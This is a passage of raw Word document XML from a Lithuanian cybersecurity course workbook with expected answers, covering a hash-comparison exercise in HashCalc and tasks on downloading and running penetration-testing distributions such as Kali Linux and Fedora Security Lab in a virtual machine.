        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pa</w:t>
      </w:r>
      <w:r w:rsidR="00095E4E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">žymėkite </w:t>
      </w:r>
      <w:r w:rsidR="00D30046" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HMAC</w:t>
      </w:r>
      <w:r w:rsidR="00D30046" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F2C67" w14:textId="213EA5A8" w:rsidR="00240813" w:rsidRPr="005A5C28" w:rsidRDefault="00AC083D" w:rsidP="00131ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="284" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>pa</w:t>
      </w:r>
      <w:r w:rsidR="00B72B61" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">žymėkite visus maišos tipus, išskyrus </w:t>
      </w:r>
      <w:r w:rsidR="00B72B61" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>MD5</w:t>
      </w:r>
      <w:r w:rsidR="00B72B61" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40403981" w14:textId="14A7424D" w:rsidR="009B437A" w:rsidRPr="005A5C28" w:rsidRDefault="00255B65" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spustelėkite mygtuką Skaičiuoti.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA7307A" w14:textId="6E03CD70" w:rsidR="00223654" w:rsidRPr="005A5C28" w:rsidRDefault="00223654" w:rsidP="00131ECD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="284" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atsakymai gali skirtis. Pavyzdys: 82e8ac8d4ae929c79e1ce4cf1f0691f4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C651D3E" w14:textId="0D008FF2" w:rsidR="0051124B" w:rsidRPr="005A5C28" w:rsidRDefault="0051124B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Dokumente hash.txt redaguokite turinį ir išsaugokite palikdami pakitimus</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA6E34" w14:textId="0EF4E2A0" w:rsidR="00B209FC" w:rsidRPr="005A5C28" w:rsidRDefault="00043207" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Eikite į </w:t>
      </w:r>
      <w:r w:rsidR="000E0AF8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>D</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>arbalaukį ir atidarykite hash.txt failą</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6EEBD2" w14:textId="6F66C133" w:rsidR="007B39CC" w:rsidRPr="005A5C28" w:rsidRDefault="007B39CC" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atlikite nežymų teksto keitimą, pvz., laiško naikinimas arba tarpo ar teksto pridėjimas</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60761610" w14:textId="551115EB" w:rsidR="00F360A7" w:rsidRPr="005A5C28" w:rsidRDefault="00F360A7" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Failas &gt; Įrašyti ir uždarykite Užrašinę</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1F8B45" w14:textId="0B82BE6D" w:rsidR="0051124B" w:rsidRPr="005A5C28" w:rsidRDefault="0051124B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Dar kartą suskaičiuokite maišos eilę dokumentui hash.txt</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8F757A" w14:textId="2F0DF7B5" w:rsidR="00700C27" w:rsidRPr="005A5C28" w:rsidRDefault="00414587" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Dar kartą spustelėkite mygtuką Skaičiuoti HashCalc</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D915480" w14:textId="2DECC6C3" w:rsidR="00924E65" w:rsidRPr="005A5C28" w:rsidRDefault="004A0599" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Atsakymai gali skirtis</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> nuo 3 veiksmo</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>. Pavyz</w:t>
      </w:r>
      <w:r w:rsidR="00AC083D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>džiui</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>: fb53ad826cefac1dbee8f583a66b7bf4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2EB54D" w14:textId="7788938C" w:rsidR="0051124B" w:rsidRPr="005A5C28" w:rsidRDefault="0051124B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Palyginkite abiem atvejais gautą maišos eilę.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E1950D" w14:textId="7BA2F60F" w:rsidR="00D746A4" w:rsidRPr="005A5C28" w:rsidRDefault="00E358CE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">Maišos eilė skiriasi: 82e8ac8d4ae929c79e1ce4cf1f0691f4 </w:t>
      </w:r>
      <w:r w:rsidR="00CC5BF8" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>≠ fb53ad826cefac1dbee8f583a66b7bf4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EE1FA5" w14:textId="43E3C619" w:rsidR="0051124B" w:rsidRPr="005A5C28" w:rsidRDefault="0051124B" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Kodėl maišos eilės skiriasi?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14338EA4" w14:textId="7BBD60B4" w:rsidR="00104A62" w:rsidRPr="005A5C28" w:rsidRDefault="005962DD" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="128"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Maišos eilei suskaičiuoti buvo naudojamas tas pats failas su skirtingu turiniu</w:t>
      </w:r>
      <w:r w:rsidR="000F097F" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AB49D1" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Arba du skirtingi duomenų vienetai.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F11E69" w14:textId="77777777" w:rsidR="00373521" w:rsidRPr="005A5C28" w:rsidRDefault="00373521" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7408185A" w14:textId="77777777" w:rsidR="00373521" w:rsidRPr="005A5C28" w:rsidRDefault="00373521" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="032ECB49" w14:textId="77777777" w:rsidR="00DA21A6" w:rsidRPr="005A5C28" w:rsidRDefault="00DA21A6"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9 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PATEIKITE TIESIOGINES NUORODAS, PER KURIAS GALIMA PARSISIŲSTI DVI SKIRTINGAS ATSPARUMO TESTAVIMUI SKIRTAS OPERACINES SISTEMAS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA55598" w14:textId="77777777" w:rsidR="001A2230" w:rsidRPr="005A5C28" w:rsidRDefault="001A2230"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AI / LAUKIAMAS REZULTATAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7932A0BF" w14:textId="76068FD4" w:rsidR="00E470D9" w:rsidRPr="005A5C28" w:rsidRDefault="00E470D9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali Linux. Versija 2020.4. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId257">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://cdimage.kali.org/kali-2020.4/kali-linux-2020.4-installer-amd64.iso</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="264DBCE5" w14:textId="631B6438" w:rsidR="00E470D9" w:rsidRPr="005A5C28" w:rsidRDefault="00E470D9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Labs Fedora Projects. Fedora 33 Security Lab. Prieiga per internetą: </w:t>
      </w:r>
      <w:hyperlink r:id="rId258">
        <w:r w:rsidRPr="005A5C28">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:lang w:val="lt-LT"/>
          </w:rPr>
          <w:t>https://download.fedoraproject.org/pub/alt/releases/33/Labs/x86_64/iso/Fedora-Security-Live-x86_64-33-1.2.iso</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0034644C" w14:textId="54A88C11" w:rsidR="00E470D9" w:rsidRPr="005A5C28" w:rsidRDefault="00E470D9" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00024BE8" w14:textId="77777777" w:rsidR="001757B9" w:rsidRPr="005A5C28" w:rsidRDefault="001757B9"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10 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>NAUDODAMIESI VIRTUALIZAVUI SKIRTĄ PROGRAMINĘ ĮRANGĄ PALEISKITE ARBA ĮDIEKITE VIENĄ IŠ ATSPARUMO TESTAVIMUI SKIRTŲ OPERACINIŲ SISTEMŲ. PATEIKITE OPERACINĖS SISTEMOS DARBALAUKIO EKRANO VAIZDĄ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D59D16" w14:textId="77777777" w:rsidR="001A2230" w:rsidRPr="005A5C28" w:rsidRDefault="001A2230"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AI / LAUKIAMAS REZULTATAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E5029E" w14:textId="77777777" w:rsidR="007607C5" w:rsidRPr="005A5C28" w:rsidRDefault="6A69F3B4" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:eastAsia="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48C5846F" wp14:editId="1BC2B59C">
            <wp:extent cx="5219702" cy="3914775"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="2" name="Paveikslėlis 2" descr="Meet Kali Linux 2.0, a distro built to hammer y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259">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5219702" cy="3914775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A216FA" w14:textId="4FF74A62" w:rsidR="007607C5" w:rsidRPr="005A5C28" w:rsidRDefault="002C3B85" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="007607C5" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> pav. OS Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30585BC6" w14:textId="77777777" w:rsidR="007607C5" w:rsidRPr="005A5C28" w:rsidRDefault="007607C5"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56CD21AD" w14:textId="2BBBA7FE" w:rsidR="007607C5" w:rsidRPr="005A5C28" w:rsidRDefault="007607C5" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D73D85" w14:textId="77777777" w:rsidR="00120D6C" w:rsidRPr="005A5C28" w:rsidRDefault="00120D6C"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11 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PASIRINKITE VIENĄ IŠ ATSPARUMO TESTAVIMUI SKIRTŲ OPERACINIŲ SISTEMŲ. PATEIKITE PASIRINKTOJE SISTEMOJE NAUDOJAMŲ PENKIŲ PROGRAMINIŲ ĮRANGŲ PAVADINIMUS IR JŲ APRAŠYMUS. UŽPILDYKITE LENTELĘ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA39A34" w14:textId="77777777" w:rsidR="00A95FDE" w:rsidRPr="005A5C28" w:rsidRDefault="00A95FDE" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21C796B4" w14:textId="40A807FF" w:rsidR="00465D5F" w:rsidRPr="005A5C28" w:rsidRDefault="00465D5F" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ATSAKYMO PAVYZDYS</w:t>
      </w:r>
      <w:r w:rsidR="001A2230" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D94CE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="008C63ED" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D94CE4" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>LAUKIAMAS REZULTATAS</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
